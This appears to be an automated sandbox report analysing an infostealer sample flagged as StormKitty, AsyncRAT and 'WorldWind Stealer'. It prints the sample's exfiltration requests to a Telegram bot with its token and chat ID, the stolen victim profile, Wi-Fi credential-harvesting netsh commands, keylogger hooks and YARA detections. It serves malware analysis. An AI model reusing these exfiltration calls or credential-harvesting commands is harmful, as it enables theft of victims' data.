                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: unknownHTTP traffic detected: POST /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165040754 HTTP/1.1Content-Type: multipart/form-data; boundary="1b2c3db3-4c43-4a40-ba16-8f0a6647d75a"Host: api.telegram.orgContent-Length: 194790Expect: 100-continue
                                  Source: unknownDNS traffic detected: queries for: 202.200.1.0.in-addr.arpa
                                  Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-06-23%209:21:17%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20116938%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20F8HBZTST%0ARAM:%204095MB%0AHWID:%2067C81467FB%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%2084.17.52.5%0ABSSID:%2000:0c:29:82:cb:33%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%209%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                                  Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49715 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49716 version: TLS 1.2

                                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                                  barindex
                                  Yara detected AsyncRAT
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Contains functionality to log keystrokes (.Net Source)
                                  Source: file.exe, Client/Modules/Keylogger/Keylogger.cs.Net Code: SetHook
                                  Source: file.exe, Client/Modules/Keylogger/Keylogger.cs.Net Code: KeyboardLayout
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Modules/Keylogger/Keylogger.cs.Net Code: SetHook
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Modules/Keylogger/Keylogger.cs.Net Code: KeyboardLayout
                                  Source: file.exe, 00000000.00000002.741020710.00000000014E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Modifies existing user documents (likely ransomware behavior)
                                  Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG\QFAPOWPAFG.docxJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\BQJUWOYRTO.pngJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE\NIRMEKAMZH.xlsxJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\NIRMEKAMZH.xlsxJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP\GNLQNHOLWB.jpgJump to behavior

                                  System Summary

                                  barindex
                                  Malicious sample detected (through community Yara rule)
                                  Source: file.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                  Source: file.exe, type: SAMPLEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: file.exe, type: SAMPLEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                                  Source: file.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                  Source: file.exe, type: SAMPLEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                                  Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                  Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                  Source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: file.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: file.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: file.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                                  Source: file.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                  Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                                  Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_032596280_2_03259628
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0325CB380_2_0325CB38
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03258D580_2_03258D58
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03258A100_2_03258A10
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0329CAC70_2_0329CAC7
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0329CAD80_2_0329CAD8
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_032976690_2_03297669
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_032976780_2_03297678
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03291D600_2_03291D60
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03291D700_2_03291D70
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameClient.exe. vs file.exe
                                  Source: file.exe, 00000000.00000002.741020710.00000000014E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                                  Source: file.exeBinary or memory string: OriginalFilenameClient.exe. vs file.exe
                                  Source: file.exeVirustotal: Detection: 74%
                                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001 Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001 Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
